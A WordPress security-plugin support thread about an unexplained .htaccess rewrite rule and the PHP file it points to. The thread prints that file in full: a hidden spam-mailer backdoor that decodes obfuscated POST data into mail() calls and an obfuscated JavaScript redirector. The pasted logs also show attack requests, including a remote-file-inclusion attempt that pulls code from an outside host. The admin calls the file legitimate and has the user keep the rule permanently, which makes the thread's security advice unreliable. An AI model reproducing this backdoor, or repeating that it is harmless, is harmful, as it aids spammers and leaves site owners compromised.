chairlady-guardhouse.php htaccess RewriteRule

[holbrook]

Hello,

This code is in my .htaccess file at the top (I have BPS):

RewriteRule ^0608630493/(.*)$ chairlady-guardhouse.php [QSA,L]

This code has been there since October 8, 2016 (server file date). Is it something to be concerned about? The only thing I recall doing is creating a couple of new users.

Thank you.

[AITpro Admin]

The RewriteRule says to rewrite this URI:  0608630493 to this URI:  chairlady-guardhouse.php.   Do you recognize this file:  chairlady-guardhouse.php? Are you using any plugins that create htaccess code?

[holbrook]

I don’t know of any plugins that I have that create htaccess code. Plugins that I use:

Akismet, BPS, Jetpack, Simple Google Map, Simple Google Sitemap, Weaver II Maintenance, Weaver II Theme Extras. I will continue looking to see if any of these create htaccess code.

I don’t find in the Log that a plugin was blocked on the day (10/8/2016 10:31 am) this file (chairlady-guardhouse.php) was created. Here are the log entries for that date:

[403 GET Request: October 8, 2016 6:14 am]
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
Solution: N/A - Hacker/Spammer Blocked/Forbidden
REMOTE_ADDR: 54.200.203.227
Host Name: ec2-54-200-203-227.us-west-2.compute.amazonaws.com
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER: https://www.google.com
REQUEST_URI: /wp-login.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

[403 POST Request: October 8, 2016 2:31 pm]
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
Solution: N/A - Hacker/Spammer Blocked/Forbidden
REMOTE_ADDR: 195.154.77.147
Host Name: 195-154-77-147.rev.poneytelecom.eu
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-includes/theme-compat/footer_ver1.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
REQUEST BODY: --------------------------b28b44e5c0efe2ab
Content-Disposition: form-data; name="vdpgjkkp"

==QZjh2bgIyRP90Ti4iIPRUIisTDKUGepR3O
--------------------------b28b44e5c0efe2ab--
[403 GET Request: October 8, 2016 3:44 pm]
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
Solution: N/A - Hacker/Spammer Blocked/Forbidden
REMOTE_ADDR: 52.43.107.138
Host Name: ec2-52-43-107-138.us-west-2.compute.amazonaws.com
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER: https://www.google.com
REQUEST_URI: /wp-login.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0

[403 GET Request: October 8, 2016 6:22 pm]
Event Code: PSBR-HPR
Solution: http://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: 178.162.205.5
Host Name: 178.162.205.5
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-mobile-detector/resize.php?src=http://1268vip.com/wp-content/plugins/juna-it-poll/db.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32

[403 GET Request: October 8, 2016 8:31 pm]
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
Solution: N/A - Hacker/Spammer Blocked/Forbidden
REMOTE_ADDR: 54.234.145.122
Host Name: ec2-54-234-145-122.compute-1.amazonaws.com
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER: https://www.google.com
REQUEST_URI: /wp-login.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0

Here are the contents of the chairlady-guardhouse.php file:

<?php
function base64_url_decode($val) {
    return base64_decode(strtr($val, '-_,', '+/='));
}
if(isset($_POST) and count($_POST) > 0){
	if(isset($_POST["chk"])){
	    $val = array();
	    $val["res"] = 1;
	    print json_encode($val);
	}else{
	    $post_data = array_values(array_map('stripslashes', $_POST));
	    $m_data = explode("|||", base64_url_decode(strrev($post_data[0])));
	    if(count($m_data) > 1){
		    $val = array();
		    if(mail($m_data[0], $m_data[1], $m_data[2], $m_data[3])){
		        $val["mail"] = 1;
		    } else{
		        $val["mail"] = 0;
		    }
		    print json_encode($val);
	    }
    }
}

if(isset($_GET) and count($_GET) > 0){
    $url = "";
    $redic = array_values($_GET);
    foreach(str_split(base64_url_decode($redic[0])) as $letter){
            if(rand(1,3) == 1){
                    $url .= $letter;
            }else{
                    $url .= $letter."'+'";
            }
    }
?>
<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>Redirecting</title>
<script>
var r = '<?php echo $url;?>';
var _0x485b=["\x72\x65\x70\x6C\x61\x63\x65"];
</script>
</head>
<body onload="location[_0x485b[0]](r);">
Loading...
</body></html>
<?php } ?>

[AITpro Admin]

Where did you find the chairlady-guardhouse.php file?  The code in general is non-malicious, but it would be good to know the origin to confirm the source.

[holbrook]

The chairlady-guardhouse.php file is in my public_html folder. My public_html folder contains two WP websites. The chairlady-guardhouse.php file is of the type application/x-httpd-php (shown in my File Manager), and the  permissions are 0644. It appears in my file manager right under the .htaccess file.

[AITpro Admin]

The file and htaccess code appear to be legitimate.  So add your htaccess code to this Root Custom Code text box: CUSTOM CODE BOTTOM HOTLINKING/FORBID COMMENT SPAMMERS/BLOCK BOTS/BLOCK IP/REDIRECT CODE, click the Save Root Custom Code button and activate Root folder BulletProof mode.

[holbrook]

So, I copy everything that is presently in my htaccess file and then paste it into the text box that you specified, is that right? I do this for both of my sites?

Could you give me a little explanation to help me make sense of what I’m doing here?

Am I copying the htaccess code from the htaccess file in the BulletProof Security Plugin or from the htaccess code on my server? If it is the one in BPS, which one do I use (secure.htaccess, default.htaccess, etc.)?

The htaccess file contents that I gave you a couple days ago was from the htaccess file on my server.

[AITpro Admin]

These are the literal steps to add the htaccess code to BPS Custom Code, which saves the htaccess code permanently so that it will always be saved/written/created in your Root htaccess file any time you click the Root Folder BulletProof Mode activate button:

1. Copy this htaccess code: RewriteRule ^0608630493/(.*)$ chairlady-guardhouse.php [QSA,L] to this BPS Root Custom Code text box: CUSTOM CODE BOTTOM HOTLINKING/FORBID COMMENT SPAMMERS/BLOCK BOTS/BLOCK IP/REDIRECT CODE
2. Click the Save Root Custom Code button.
3. Go to the Security Modes tab page and click the Root Folder BulletProof Mode activate button.

[holbrook]

Ok, thank you. Do I then need to delete “RewriteRule ^0608630493/(.*)$ chairlady-guardhouse.php [QSA,L]” from my htaccess file that’s on my server?

[AITpro Admin]

Nope, you do not need to do anything manually with that htaccess code in your Root htaccess file.  When you copy the htaccess code (or any htaccess code) to Custom Code it is saved permanently.  When you click the Root folder BulletProof Mode activate button a new Root htaccess file is created that overwrites your current Root htaccess file.  So the end result is that the htaccess code that you saved in BPS Custom Code is and will always be created in your new Root htaccess file.

[holbrook]

Ok, all finished with that. Thank you very much!

[Author]

Posts